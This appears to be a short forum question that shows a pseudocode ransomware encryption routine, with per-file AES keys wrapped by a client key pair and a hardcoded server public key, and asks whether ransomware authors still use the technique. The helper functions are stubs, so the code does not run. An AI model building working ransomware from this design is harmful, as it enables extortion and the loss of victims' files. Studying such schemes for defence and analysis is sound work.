ransomware-encryption-routine.py

# client public and private key will be here / generated new key pair for each infection
client_public_key = "" 
client_private_key = ""

# hardcoded Spub.key
server_public_key = ""

# encrypt Cpriv.key with Spub.key
encrypted_client_private_key = encrypt_client_private_key(client_private_key, server_public_key)
write_to_disk(encrypted_client_private_key)

# desallocated client private key
delete_client_private_key(client_private_key)

# found files on infected machine
found_files = []

# encrypted AES keys will be stored here
encrypted_aes_keys = []

# for each file
for file in found_files:
    # generate random AES key
    aes_key = generate_aes_key()
    
    # encrypt the file with the key
    encrypt_file(file, aes_key)
    
    # encrypt AES key with Cpub.key
    encrypted_aes_key = encrypt_aes_key(aes_key, client_public_key)
    encrypted_aes_keys.append(encrypted_aes_key)
    
    # Desallocated old key
    delete_aes_key(aes_key)
    
# save to disk encrypted AES keys
write_to_disk(encrypted_aes_keys)

Are ransomware authors still using this technique?